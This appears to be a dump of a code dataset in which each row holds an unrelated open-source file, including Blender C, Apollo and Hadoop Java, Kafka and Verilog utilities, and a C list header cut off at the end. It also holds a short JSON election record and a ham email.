max_stars_count
int64
301
224k
text
stringlengths
6
1.05M
token_count
int64
3
727k
365
/* * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software Foundation, * Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. * * The Original Code is Copyright (C) 2020 Blender Foundation. * All rights reserved. */ /** \file * \ingroup bke */ #include "multires_reshape.h" #include <string.h> #include "BLI_utildefines.h" #include "BKE_ccg.h" #include "BKE_subdiv_ccg.h" bool multires_reshape_assign_final_coords_from_ccg(const MultiresReshapeContext *reshape_context, struct SubdivCCG *subdiv_ccg) { CCGKey reshape_level_key; BKE_subdiv_ccg_key(&reshape_level_key, subdiv_ccg, reshape_context->reshape.level); const int reshape_grid_size = reshape_context->reshape.grid_size; const float reshape_grid_size_1_inv = 1.0f / (((float)reshape_grid_size) - 1.0f); int num_grids = subdiv_ccg->num_grids; for (int grid_index = 0; grid_index < num_grids; ++grid_index) { CCGElem *ccg_grid = subdiv_ccg->grids[grid_index]; for (int y = 0; y < reshape_grid_size; ++y) { const float v = (float)y * reshape_grid_size_1_inv; for (int x = 0; x < reshape_grid_size; ++x) { const float u = (float)x * reshape_grid_size_1_inv; GridCoord grid_coord; grid_coord.grid_index = grid_index; grid_coord.u = u; grid_coord.v = v; ReshapeGridElement grid_element = multires_reshape_grid_element_for_grid_coord( reshape_context, &grid_coord); BLI_assert(grid_element.displacement != NULL); memcpy(grid_element.displacement, CCG_grid_elem_co(&reshape_level_key, ccg_grid, x, y), sizeof(float[3])); /* NOTE: The sculpt mode might have SubdivCCG's data out of sync from what is stored in * the original object. This happens upon the following scenario: * * - User enters sculpt mode of the default cube object. * - Sculpt mode creates new `layer` * - User does some strokes. * - User used undo until sculpt mode is exited. * * In an ideal world the sculpt mode will take care of keeping CustomData and CCG layers in * sync by doing proper pushes to a local sculpt undo stack. * * Since the proper solution needs time to be implemented, consider the target object * the source of truth of which data layers are to be updated during reshape. This means, * for example, that if the undo system says object does not have paint mask layer, it is * not to be updated. * * This is a fragile logic, and is only working correctly because the code path is only * used by sculpt changes. In other use cases the code might not catch inconsistency and * silently do wrong decision. */ /* NOTE: There is a known bug in Undo code that results in first Sculpt step * after a Memfile one to never be undone (see T83806). This might be the root cause of * this inconsistency. */ if (reshape_level_key.has_mask && grid_element.mask != NULL) { *grid_element.mask = *CCG_grid_elem_mask(&reshape_level_key, ccg_grid, x, y); } } } } return true; }
1,456
3,002
package com.apollographql.apollo; import com.apollographql.apollo.api.Response; import com.apollographql.apollo.api.Subscription; import com.apollographql.apollo.exception.ApolloCanceledException; import com.apollographql.apollo.exception.ApolloException; import com.apollographql.apollo.internal.util.Cancelable; import org.jetbrains.annotations.NotNull; /** * <p>{@code ApolloSubscriptionCall} is an abstraction for a request that has been prepared for subscription. * <code>ApolloSubscriptionCall<code/> cannot be executed twice, though it can be cancelled. Any updates pushed by * server related to provided subscription will be notified via {@link Callback}</p> * * <p>In order to execute the request again, call the {@link ApolloSubscriptionCall#clone()} method which creates a new * {@code ApolloSubscriptionCall} object.</p> */ public interface ApolloSubscriptionCall<T> extends Cancelable { /** * Sends {@link Subscription} to the subscription server and starts listening for the pushed updates. To cancel this * subscription call use {@link #cancel()}. * * @param callback which will handle the subscription updates or a failure exception. * @throws ApolloCanceledException when the call has already been canceled * @throws IllegalStateException when the call has already been executed */ void execute(@NotNull Callback<T> callback); /** * Creates a new, identical call to this one which can be executed even if this call has already been. * * @return The cloned {@code ApolloSubscriptionCall} object. */ ApolloSubscriptionCall<T> clone(); /** * Sets the cache policy for response/request cache. * * @param cachePolicy {@link CachePolicy} to set * @return {@link ApolloSubscriptionCall} with the provided {@link CachePolicy} */ @NotNull ApolloSubscriptionCall<T> cachePolicy(@NotNull CachePolicy cachePolicy); /** * Factory for creating {@link ApolloSubscriptionCall} calls. */ interface Factory { /** * Creates and prepares a new {@link ApolloSubscriptionCall} call. * * @param subscription to be sent to the subscription server to start listening pushed updates * @return prepared {@link ApolloSubscriptionCall} call to be executed */ <D extends Subscription.Data, T, V extends Subscription.Variables> ApolloSubscriptionCall<T> subscribe( @NotNull Subscription<D, T, V> subscription); } /** * Subscription normalized cache policy. */ enum CachePolicy { /** * Signals the apollo subscription client to bypass normalized cache. Fetch GraphQL response from the network only and don't cache it. */ NO_CACHE, /** * Signals the apollo subscription client to fetch the GraphQL response from the network only and cache it to normalized cache. */ NETWORK_ONLY, /** * Signals the apollo subscription client to first fetch the GraphQL response from the cache, then fetch it from network. */ CACHE_AND_NETWORK } /** * Communicates responses from a subscription server. */ interface Callback<T> { /** * Gets called when GraphQL response is received and parsed successfully. This may be called multiple times. {@link * #onCompleted()} will be called after the final call to onResponse. * * @param response the GraphQL response */ void onResponse(@NotNull Response<T> response); /** * Gets called when an unexpected exception occurs while creating the request or processing the response. Will be * called at most one time. It is considered a terminal event. After called, neither {@link #onResponse(Response)} * or {@link #onCompleted()} will be called again. */ void onFailure(@NotNull ApolloException e); /** * Gets called when final GraphQL response is received. It is considered a terminal event. */ void onCompleted(); /** * Gets called when GraphQL subscription server connection is closed unexpectedly. It is considered to re-try * the subscription later. */ void onTerminated(); /** * Gets called when GraphQL subscription server connection is opened. */ void onConnected(); } }
1,256
345
# lfs imports from lfs.checkout.settings import CHECKOUT_TYPE_ANON from lfs.core.utils import get_default_shop from django.conf import settings def main(request): """context processor for lfs """ shop = get_default_shop(request) return { "SHOP": shop, "ANON_ONLY": shop.checkout_type == CHECKOUT_TYPE_ANON, "LFS_DOCS": settings.LFS_DOCS, }
160
612
<filename>parse/src/test/java/com/parse/ParseTextUtilsTest.java /* * Copyright (c) 2015-present, Parse, LLC. * All rights reserved. * * This source code is licensed under the BSD-style license found in the * LICENSE file in the root directory of this source tree. An additional grant * of patent rights can be found in the PATENTS file in the same directory. */ package com.parse; import static org.junit.Assert.assertEquals; import static org.junit.Assert.assertFalse; import static org.junit.Assert.assertTrue; import java.util.Arrays; import java.util.Collections; import org.junit.Test; public class ParseTextUtilsTest { // region testJoin @Test public void testJoinMultipleItems() { String joined = ParseTextUtils.join(",", Arrays.asList("one", "two", "three")); assertEquals("one,two,three", joined); } @Test public void testJoinSingleItem() { String joined = ParseTextUtils.join(",", Collections.singletonList("one")); assertEquals("one", joined); } // endregion // region testIsEmpty @Test public void testEmptyStringIsEmpty() { assertTrue(ParseTextUtils.isEmpty("")); } @Test public void testNullStringIsEmpty() { assertTrue(ParseTextUtils.isEmpty(null)); } @Test public void testStringIsNotEmpty() { assertFalse(ParseTextUtils.isEmpty("not empty")); } // endregion // region testEquals @Test public void testEqualsNull() { assertTrue(ParseTextUtils.equals(null, null)); } @Test public void testNotEqualsNull() { assertFalse(ParseTextUtils.equals("not null", null)); assertFalse(ParseTextUtils.equals(null, "not null")); } @Test public void testEqualsString() { String same = "Hello, world!"; assertTrue(ParseTextUtils.equals(same, same)); assertTrue(ParseTextUtils.equals(same, same + "")); // Hack to compare different instances } @Test public void testNotEqualsString() { assertFalse(ParseTextUtils.equals("grantland", "nlutsenko")); } // endregion }
803
1,189
<reponame>serkan-korkut-oss-test/opentelemetry-java /* * Copyright The OpenTelemetry Authors * SPDX-License-Identifier: Apache-2.0 */ package io.opentelemetry.sdk.resources; import static org.assertj.core.api.Assertions.assertThat; import io.opentelemetry.sdk.autoconfigure.OpenTelemetryResourceAutoConfiguration; import io.opentelemetry.semconv.resource.attributes.ResourceAttributes; import org.junit.jupiter.api.Test; class ResourceDisabledByPropertyTest { @Test void osAndProcessDisabled() { Resource resource = OpenTelemetryResourceAutoConfiguration.configureResource(); assertThat(resource.getAttribute(ResourceAttributes.OS_TYPE)).isNull(); assertThat(resource.getAttribute(ResourceAttributes.PROCESS_PID)).isNull(); assertThat(resource.getAttribute(ResourceAttributes.PROCESS_RUNTIME_NAME)).isNotNull(); } }
266
359
package com.github.thomasdarimont.keycloak.eventlistener.kafka; import org.apache.kafka.clients.producer.KafkaProducer; import org.apache.kafka.clients.producer.Producer; import org.apache.kafka.clients.producer.ProducerConfig; import org.apache.kafka.common.serialization.StringSerializer; import java.util.Map; import java.util.Properties; public final class KafkaProducerFactory { private KafkaProducerFactory() { // prevent instantiation } public static Producer<String, String> createProducer(String clientId, String bootstrapServer, Map<String, Object> optionalProperties) { Properties props = new Properties(); props.put(ProducerConfig.BOOTSTRAP_SERVERS_CONFIG, bootstrapServer); props.put(ProducerConfig.CLIENT_ID_CONFIG, clientId); props.put(ProducerConfig.KEY_SERIALIZER_CLASS_CONFIG, StringSerializer.class.getName()); props.put(ProducerConfig.VALUE_SERIALIZER_CLASS_CONFIG, StringSerializer.class.getName()); props.putAll(optionalProperties); // fix Class org.apache.kafka.common.serialization.StringSerializer could not be // found. see https://stackoverflow.com/a/50981469 ClassLoader tcl = Thread.currentThread().getContextClassLoader(); try { Thread.currentThread().setContextClassLoader(null); return new KafkaProducer<>(props); } finally { Thread.currentThread().setContextClassLoader(tcl); } } }
547
1,346
<gh_stars>1000+ def build_version(base, branch): version = '.'.join([str(x) for x in base]) if branch == 'master': return version return version + '-' + branch
69
841
package org.jboss.resteasy.test.cdi.basic.resource; import jakarta.ejb.Local; import jakarta.ejb.Timeout; import jakarta.ejb.Timer; import jakarta.ws.rs.core.Response; @Local public interface OutOfBandResourceIntf { Response scheduleTimer(); Response testTimer() throws InterruptedException; @Timeout void timeout(Timer timer); }
119
1,738
<filename>dev/Code/Sandbox/Editor/Include/IDataBaseManager.h /* * All or portions of this file Copyright (c) Amazon.com, Inc. or its affiliates or * its licensors. * * For complete copyright and license terms please see the LICENSE at the root of this * distribution (the "License"). All use of this software is governed by the License, * or, if provided, by the license below or the license accompanying this file. Do not * remove or modify any license notices. This file is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * */ // Original file Copyright Crytek GMBH or its affiliates, used under license. #ifndef CRYINCLUDE_EDITOR_INCLUDE_IDATABASEMANAGER_H #define CRYINCLUDE_EDITOR_INCLUDE_IDATABASEMANAGER_H #pragma once struct IDataBaseItem; struct IDataBaseLibrary; enum EDataBaseItemEvent { EDB_ITEM_EVENT_ADD, EDB_ITEM_EVENT_DELETE, EDB_ITEM_EVENT_CHANGED, EDB_ITEM_EVENT_SELECTED, EDB_ITEM_EVENT_UPDATE_PROPERTIES, EDB_ITEM_EVENT_UPDATE_PROPERTIES_NO_EDITOR_REFRESH }; ////////////////////////////////////////////////////////////////////////// // Description: // Callback class to intercept item creation and deletion events. ////////////////////////////////////////////////////////////////////////// struct IDataBaseManagerListener { virtual void OnDataBaseItemEvent(IDataBaseItem* pItem, EDataBaseItemEvent event) = 0; }; ////////////////////////////////////////////////////////////////////////// // Description: // his interface is used to enumerate al items registered to the database manager. ////////////////////////////////////////////////////////////////////////// struct IDataBaseItemEnumerator { virtual ~IDataBaseItemEnumerator() = default; virtual void Release() = 0; virtual IDataBaseItem* GetFirst() = 0; virtual IDataBaseItem* GetNext() = 0; }; ////////////////////////////////////////////////////////////////////////// // // Interface to the collection of all items or specific type // in data base libraries. // ////////////////////////////////////////////////////////////////////////// struct IDataBaseManager { //! Clear all libraries. virtual void ClearAll() = 0; ////////////////////////////////////////////////////////////////////////// // Library items. ////////////////////////////////////////////////////////////////////////// //! Make a new item in specified library. virtual IDataBaseItem* CreateItem(IDataBaseLibrary* pLibrary) = 0; //! Delete item from library and manager. virtual void DeleteItem(IDataBaseItem* pItem) = 0; //! Find Item by its GUID. virtual IDataBaseItem* FindItem(REFGUID guid) const = 0; virtual IDataBaseItem* FindItemByName(const QString& fullItemName) = 0; virtual IDataBaseItemEnumerator* GetItemEnumerator() = 0; // Select one item in DB. virtual void SetSelectedItem(IDataBaseItem* pItem) = 0; ////////////////////////////////////////////////////////////////////////// // Libraries. ////////////////////////////////////////////////////////////////////////// //! Add Item library. Set isLevelLibrary to true if its the "level" library which gets saved inside the level virtual IDataBaseLibrary* AddLibrary(const QString& library, bool isLevelLibrary = false, bool bIsLoading = true) = 0; virtual void DeleteLibrary(const QString& library, bool forceDeleteLibrary = false) = 0; //! Get number of libraries. virtual int GetLibraryCount() const = 0; //! Get Item library by index. virtual IDataBaseLibrary* GetLibrary(int index) const = 0; //! Find Items Library by name. virtual IDataBaseLibrary* FindLibrary(const QString& library) = 0; //! Load Items library. #ifdef LoadLibrary #undef LoadLibrary #endif virtual IDataBaseLibrary* LoadLibrary(const QString& filename, bool bReload = false) = 0; //! Save all modified libraries. virtual void SaveAllLibs() = 0; //! Serialize property manager. virtual void Serialize(XmlNodeRef& node, bool bLoading) = 0; //! Export items to game. virtual void Export(XmlNodeRef& node) {}; //! Returns unique name base on input name. virtual QString MakeUniqueItemName(const QString& name, const QString& libName = "") = 0; virtual QString MakeFullItemName(IDataBaseLibrary* pLibrary, const QString& group, const QString& itemName) = 0; //! Root node where this library will be saved. virtual QString GetRootNodeName() = 0; //! Path to libraries in this manager. virtual QString GetLibsPath() = 0; ////////////////////////////////////////////////////////////////////////// //! Validate library items for errors. virtual void Validate() = 0; // Description: // Collects names of all resource files used by managed items. // Arguments: // resources - Structure where all filenames are collected. virtual void GatherUsedResources(CUsedResources& resources) = 0; ////////////////////////////////////////////////////////////////////////// // Register listeners. virtual void AddListener(IDataBaseManagerListener* pListener) = 0; virtual void RemoveListener(IDataBaseManagerListener* pListener) = 0; }; #endif // CRYINCLUDE_EDITOR_INCLUDE_IDATABASEMANAGER_H
1,525
348
<reponame>chamberone/Leaflet.PixiOverlay {"nom":"Champigny-lès-Langres","circ":"1ère circonscription","dpt":"Haute-Marne","inscrits":313,"abs":144,"votants":169,"blancs":15,"nuls":10,"exp":144,"res":[{"nuance":"REM","nom":"<NAME>","voix":98},{"nuance":"LR","nom":"<NAME>","voix":46}]}
117
3,976
<gh_stars>1000+ #coding=utf-8 import os from PIL import Image from PIL import ImageDraw from PIL import ImageFont path = os.path.split(os.path.realpath(__file__))[0] src = path+"/img.jpg" dst = path+"/res.jpg" s = Image.open(src) D = ImageDraw.Draw(s) w,h = s.size D.text((w-100,0), u"4", font=ImageFont.truetype(os.path.split(path)[0]+"/public/msyh_3.ttf",100),fill = (255,0,0)) s.save(dst)
178
487
<gh_stars>100-1000 // Copyright 2017-2020 The Verible Authors. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #include "verilog/CST/seq_block.h" #include "common/text/concrete_syntax_leaf.h" #include "common/text/concrete_syntax_tree.h" #include "common/text/symbol.h" #include "common/text/syntax_tree_context.h" #include "common/text/tree_utils.h" #include "verilog/CST/identifier.h" #include "verilog/CST/verilog_nonterminals.h" #include "verilog/parser/verilog_token_enum.h" namespace verilog { using verible::Symbol; using verible::SyntaxTreeContext; using verible::SyntaxTreeNode; using verible::TokenInfo; // kLabel could be prefix "label :" or suffix ": label". Handle both cases. static const verible::SyntaxTreeLeaf& GetLabelLeafText(const Symbol& label) { const auto& node = CheckSymbolAsNode(label, NodeEnum::kLabel); CHECK_EQ(node.children().size(), 2); if (node.children().front()->Tag() == verible::SymbolTag{verible::SymbolKind::kLeaf, ':'}) { return verible::SymbolCastToLeaf(*node.children().back()); } CHECK((node.children().back()->Tag() == verible::SymbolTag{verible::SymbolKind::kLeaf, ':'})); // in verilog.y, a prefix label could be an unqualified_id (to avoid grammar // conflicts), so descend to the leftmost leaf. return verible::SymbolCastToLeaf( *ABSL_DIE_IF_NULL(verible::GetLeftmostLeaf(*node.children().front()))); } // Return tehe optional label node from a kBegin node. // In verilog.y, kBegin is constructed one of two ways: // begin : label (shaped as [begin [: label]]) // label : begin (shaped as [[label :] begin]) static const SyntaxTreeNode* GetBeginLabel(const Symbol& begin) { const auto& node = CheckSymbolAsNode(begin, NodeEnum::kBegin); CHECK_EQ(node.children().size(), 2); if (node.children().front()->Tag() == verible::SymbolTag{verible::SymbolKind::kLeaf, verilog_tokentype::TK_begin}) { return verible::CheckOptionalSymbolAsNode(node.children().back().get(), NodeEnum::kLabel); } CHECK((node.children().back()->Tag() == verible::SymbolTag{verible::SymbolKind::kLeaf, verilog_tokentype::TK_begin})); return verible::CheckOptionalSymbolAsNode(node.children().front().get(), NodeEnum::kLabel); } static const SyntaxTreeNode* GetEndLabel(const Symbol& end) { const auto* label = verible::GetSubtreeAsSymbol(end, NodeEnum::kEnd, 1); if (label == nullptr) return nullptr; return verible::CheckOptionalSymbolAsNode(label, NodeEnum::kLabel); } const TokenInfo* GetBeginLabelTokenInfo(const Symbol& symbol) { const SyntaxTreeNode* label = GetBeginLabel(symbol); if (label == nullptr) return nullptr; return &GetLabelLeafText(*label).get(); } const TokenInfo* GetEndLabelTokenInfo(const Symbol& symbol) { const SyntaxTreeNode* label = GetEndLabel(symbol); if (label == nullptr) return nullptr; return &GetLabelLeafText(*label).get(); } const Symbol* GetMatchingEnd(const Symbol& symbol, const SyntaxTreeContext& context) { CHECK_EQ(NodeEnum(symbol.Tag().tag), NodeEnum::kBegin); return context.top().children().back().get(); } } // namespace verilog
1,403
14,425
<filename>hadoop-common-project/hadoop-common/src/main/java/org/apache/hadoop/fs/FsShell.java /** * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.hadoop.fs; import java.io.IOException; import java.io.PrintStream; import java.util.ArrayList; import java.util.Arrays; import java.util.LinkedList; import org.apache.hadoop.classification.InterfaceAudience; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.conf.Configured; import org.apache.hadoop.fs.shell.Command; import org.apache.hadoop.fs.shell.CommandFactory; import org.apache.hadoop.fs.shell.FsCommand; import org.apache.hadoop.security.UserGroupInformation; import org.apache.hadoop.tools.TableListing; import org.apache.hadoop.tracing.TraceUtils; import org.apache.hadoop.util.StringUtils; import org.apache.hadoop.util.Tool; import org.apache.hadoop.util.ToolRunner; import org.apache.hadoop.tracing.TraceScope; import org.apache.hadoop.tracing.Tracer; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** Provide command line access to a FileSystem. */ @InterfaceAudience.Private public class FsShell extends Configured implements Tool { static final Logger LOG = LoggerFactory.getLogger(FsShell.class); private static final int MAX_LINE_WIDTH = 80; private FileSystem fs; private Trash trash; private Help help; protected CommandFactory commandFactory; private final String usagePrefix = "Usage: hadoop fs [generic options]"; static final String SHELL_HTRACE_PREFIX = "fs.shell.htrace."; /** * Default ctor with no configuration. Be sure to invoke * {@link #setConf(Configuration)} with a valid configuration prior * to running commands. */ public FsShell() { this(null); } /** * Construct a FsShell with the given configuration. Commands can be * executed via {@link #run(String[])} * @param conf the hadoop configuration */ public FsShell(Configuration conf) { super(conf); } protected FileSystem getFS() throws IOException { if (fs == null) { fs = FileSystem.get(getConf()); } return fs; } protected Trash getTrash() throws IOException { if (this.trash == null) { this.trash = new Trash(getConf()); } return this.trash; } protected Help getHelp() throws IOException { if (this.help == null){ this.help = new Help(); } return this.help; } protected void init() { getConf().setQuietMode(true); UserGroupInformation.setConfiguration(getConf()); if (commandFactory == null) { commandFactory = new CommandFactory(getConf()); commandFactory.addObject(new Help(), "-help"); commandFactory.addObject(new Usage(), "-usage"); registerCommands(commandFactory); } } protected void registerCommands(CommandFactory factory) { // TODO: DFSAdmin subclasses FsShell so need to protect the command // registration. This class should morph into a base class for // commands, and then this method can be abstract if (this.getClass().equals(FsShell.class)) { factory.registerCommands(FsCommand.class); } } /** * Returns the Trash object associated with this shell. * @return Path to the trash * @throws IOException upon error */ public Path getCurrentTrashDir() throws IOException { return getTrash().getCurrentTrashDir(); } /** * Returns the current trash location for the path specified * @param path to be deleted * @return path to the trash * @throws IOException */ public Path getCurrentTrashDir(Path path) throws IOException { return getTrash().getCurrentTrashDir(path); } protected String getUsagePrefix() { return usagePrefix; } // NOTE: Usage/Help are inner classes to allow access to outer methods // that access commandFactory /** * Display help for commands with their short usage and long description. */ protected class Usage extends FsCommand { public static final String NAME = "usage"; public static final String USAGE = "[cmd ...]"; public static final String DESCRIPTION = "Displays the usage for given command or all commands if none " + "is specified."; @Override protected void processRawArguments(LinkedList<String> args) { if (args.isEmpty()) { printUsage(System.out); } else { for (String arg : args) printUsage(System.out, arg); } } } /** * Displays short usage of commands sans the long description */ protected class Help extends FsCommand { public static final String NAME = "help"; public static final String USAGE = "[cmd ...]"; public static final String DESCRIPTION = "Displays help for given command or all commands if none " + "is specified."; @Override protected void processRawArguments(LinkedList<String> args) { if (args.isEmpty()) { printHelp(System.out); } else { for (String arg : args) printHelp(System.out, arg); } } } /* * The following are helper methods for getInfo(). They are defined * outside of the scope of the Help/Usage class because the run() method * needs to invoke them too. */ // print all usages private void printUsage(PrintStream out) { printInfo(out, null, false); } // print one usage private void printUsage(PrintStream out, String cmd) { printInfo(out, cmd, false); } // print all helps private void printHelp(PrintStream out) { printInfo(out, null, true); } // print one help private void printHelp(PrintStream out, String cmd) { printInfo(out, cmd, true); } private void printInfo(PrintStream out, String cmd, boolean showHelp) { if (cmd != null) { // display help or usage for one command Command instance = commandFactory.getInstance("-" + cmd); if (instance == null) { throw new UnknownCommandException(cmd); } if (showHelp) { printInstanceHelp(out, instance); } else { printInstanceUsage(out, instance); } } else { // display help or usage for all commands out.println(getUsagePrefix()); // display list of short usages ArrayList<Command> instances = new ArrayList<Command>(); for (String name : commandFactory.getNames()) { Command instance = commandFactory.getInstance(name); if (!instance.isDeprecated()) { out.println("\t[" + instance.getUsage() + "]"); instances.add(instance); } } // display long descriptions for each command if (showHelp) { for (Command instance : instances) { out.println(); printInstanceHelp(out, instance); } } out.println(); ToolRunner.printGenericCommandUsage(out); } } private void printInstanceUsage(PrintStream out, Command instance) { out.println(getUsagePrefix() + " " + instance.getUsage()); } private void printInstanceHelp(PrintStream out, Command instance) { out.println(instance.getUsage() + " :"); TableListing listing = null; final String prefix = " "; for (String line : instance.getDescription().split("\n")) { if (line.matches("^[ \t]*[-<].*$")) { String[] segments = line.split(":"); if (segments.length == 2) { if (listing == null) { listing = createOptionTableListing(); } listing.addRow(segments[0].trim(), segments[1].trim()); continue; } } // Normal literal description. if (listing != null) { for (String listingLine : listing.toString().split("\n")) { out.println(prefix + listingLine); } listing = null; } for (String descLine : StringUtils.wrap( line, MAX_LINE_WIDTH, "\n", true).split("\n")) { out.println(prefix + descLine); } } if (listing != null) { for (String listingLine : listing.toString().split("\n")) { out.println(prefix + listingLine); } } } // Creates a two-row table, the first row is for the command line option, // the second row is for the option description. private TableListing createOptionTableListing() { return new TableListing.Builder().addField("").addField("", true) .wrapWidth(MAX_LINE_WIDTH).build(); } /** * run */ @Override public int run(String[] argv) { // initialize FsShell init(); Tracer tracer = new Tracer.Builder("FsShell"). conf(TraceUtils.wrapHadoopConf(SHELL_HTRACE_PREFIX, getConf())). build(); int exitCode = -1; if (argv.length < 1) { printUsage(System.err); } else { String cmd = argv[0]; Command instance = null; try { instance = commandFactory.getInstance(cmd); if (instance == null) { throw new UnknownCommandException(); } TraceScope scope = tracer.newScope(instance.getCommandName()); if (scope.getSpan() != null) { String args = StringUtils.join(" ", argv); if (args.length() > 2048) { args = args.substring(0, 2048); } scope.getSpan().addKVAnnotation("args", args); } try { exitCode = instance.run(Arrays.copyOfRange(argv, 1, argv.length)); } finally { scope.close(); } } catch (IllegalArgumentException e) { if (e.getMessage() == null) { displayError(cmd, "Null exception message"); e.printStackTrace(System.err); } else { displayError(cmd, e.getLocalizedMessage()); } printUsage(System.err); if (instance != null) { printInstanceUsage(System.err, instance); } } catch (Exception e) { // instance.run catches IOE, so something is REALLY wrong if here LOG.debug("Error", e); displayError(cmd, "Fatal internal error"); e.printStackTrace(System.err); } } tracer.close(); return exitCode; } private void displayError(String cmd, String message) { for (String line : message.split("\n")) { System.err.println(cmd + ": " + line); if (cmd.charAt(0) != '-') { Command instance = null; instance = commandFactory.getInstance("-" + cmd); if (instance != null) { System.err.println("Did you mean -" + cmd + "? This command " + "begins with a dash."); } } } } /** * Performs any necessary cleanup * @throws IOException upon error */ public void close() throws IOException { if (fs != null) { fs.close(); fs = null; } } /** * main() has some simple utility methods * @param argv the command and its arguments * @throws Exception upon error */ public static void main(String argv[]) throws Exception { FsShell shell = newShellInstance(); Configuration conf = new Configuration(); conf.setQuietMode(false); shell.setConf(conf); int res; try { res = ToolRunner.run(shell, argv); } finally { shell.close(); } System.exit(res); } // TODO: this should be abstract in a base class protected static FsShell newShellInstance() { return new FsShell(); } /** * The default ctor signals that the command being executed does not exist, * while other ctor signals that a specific command does not exist. The * latter is used by commands that process other commands, ex. -usage/-help */ @SuppressWarnings("serial") static class UnknownCommandException extends IllegalArgumentException { private final String cmd; UnknownCommandException() { this(null); } UnknownCommandException(String cmd) { this.cmd = cmd; } @Override public String getMessage() { return ((cmd != null) ? "`"+cmd+"': " : "") + "Unknown command"; } } }
4,633
3,428
<reponame>ghalimi/stdlib {"id":"01902","group":"easy-ham-1","checksum":{"type":"MD5","value":"7911c2c7f6b6f3ca8ecf8fc35df8aa28"},"text":"From <EMAIL> Thu Sep 26 11:02:56 2002\nReturn-Path: <<EMAIL>>\nDelivered-To: y<EMAIL>ass<EMAIL>int.org\nReceived: from localhost (jalapeno [127.0.0.1])\n\tby jmason.org (Postfix) with ESMTP id 0F37216F03\n\tfor <jm@localhost>; Thu, 26 Sep 2002 11:02:56 +0100 (IST)\nReceived: from jalapeno [127.0.0.1]\n\tby localhost with IMAP (fetchmail-5.9.0)\n\tfor jm@localhost (single-drop); Thu, 26 Sep 2002 11:02:56 +0100 (IST)\nReceived: from dogma.slashnull.org (localhost [127.0.0.1]) by\n dogma.slashnull.org (8.11.6/8.11.6) with ESMTP id g8Q81UC06455 for\n <<EMAIL>>; Thu, 26 Sep 2002 09:01:30 +0100\nMessage-Id: <<EMAIL>>\nTo: yyyy<EMAIL>int.org\nFrom: scripting <<EMAIL>>\nSubject: Jeremy Bowers: \"None of the trackback mechanisms has reached the\n critical m\nDate: Thu, 26 Sep 2002 08:01:30 -0000\nContent-Type: text/plain; encoding=utf-8\n\nURL: http://scriptingnews.userland.com/backissues/2002/09/25#When:5:12:19AM\nDate: Wed, 25 Sep 2002 12:12:19 GMT\n\n<NAME>[1]: \"None of the trackback mechanisms has reached the critical \nmass necessary to see the negative effects experienced in all other community \nmodels.\"\n\n[1] http://www.jerf.org/irights/2002/09/25.html#a2231\n\n\n"}
543
303
#ifndef REDROID_LIST_HDR #define REDROID_LIST_HDR #include <stdbool.h> #include <stddef.h> typedef struct list_iterator_s list_iterator_t; typedef struct list_s list_t; /* * Function: list_iterator_create * Create an iterator for a list. * * Parameters: * list - The list to create an iterator of. * * Returns: * An iterator for the list. */ list_iterator_t *list_iterator_create(list_t *list); /* * Function: list_iterator_destroy * Destroy an iterator * * Parameters: * iterator - The iterator to destroy. */ void list_iterator_destroy(list_iterator_t *iterator); /* * Function: list_iterator_reset * Reset the iterator to the head of the list. * * Parameters: * iterator - The iterator to reset. */ void list_iterator_reset(list_iterator_t *iterator); /* * Function: list_iterator_end * Check if iterator is at end of list. * * Parameters: * iterator - The iterator to check. * * Returns: * True if iterator is at the end of the list, false otherwise. */ bool list_iterator_end(list_iterator_t *iterator); /* * Function: list_iterator_next * Advance the iterator in a forward direction. * * Parameters: * The iterator to advance. * * Returns: * The element at the iterators position on advance. */ void *list_iterator_next(list_iterator_t *iterator); /* * Function: list_iterator_prev * Advance the iterator in a reverse direction. * * Parameters: * The iterator to advance. * * Returns: * The element at the iterators position on advance. */ void *list_iterator_prev(list_iterator_t *iterator); /* * Function: list_create * Create a list * * Returns: * A list */ list_t *list_create(void); /* * Function: list_destroy * Destroy a list * * Parameters: * list - The list to destroy */ void list_destroy(list_t *list); /* * Function: list_push * Push an element onto the list's tail end. * * Parameters: * list - The list to put the element into. * element - The element to put in the list. */ void list_push(list_t *list, void *element); /* * Function: list_prepend * Push an element onto the list's head end. * * Parameters: * list - The list to put the element into. * element - The element to put in the list. */ void list_prepend(list_t *list, void *element); /* * Function: list_pop * Pop an element off the list's tail end. * * Parameters: * list - The list to pop the element off of. * * Returns: * The element. */ void *list_pop(list_t *list); /* * Function: list_shift * Pop an element off the list's head end. * * Parameters: * list - The list to pop the element off of. * * Returns: * The element. * * Remarks: * This thrashes the atcache of the list. */ void *list_shift(list_t *list); /* * Function: list_at * Get an element at a list index as if it where an array. * * Parameters: * list - The list to get the element of * index - The index (i.e number of indirections from head). * * Returns: * The element. * * Remarks: * If the list is used where only tail operations are performed, i.e * no shifting, no erasing and no sorting then the internal atcache * mechanism of the list will make this O(1) best case. In the event * where that isn't the case there may still be hope. For instance * when making calls to list_find and list_search the atcache is * thrashed and replaced to reflect the current ordering of the list * at least up to the find/search invariant. This means O(1) is still * very possible. In the event that none of this is the case a linear * search takes place from the index and it becomes cached so that * subsequent searches become O(1). The worst case complexity is still * O(n). */ void 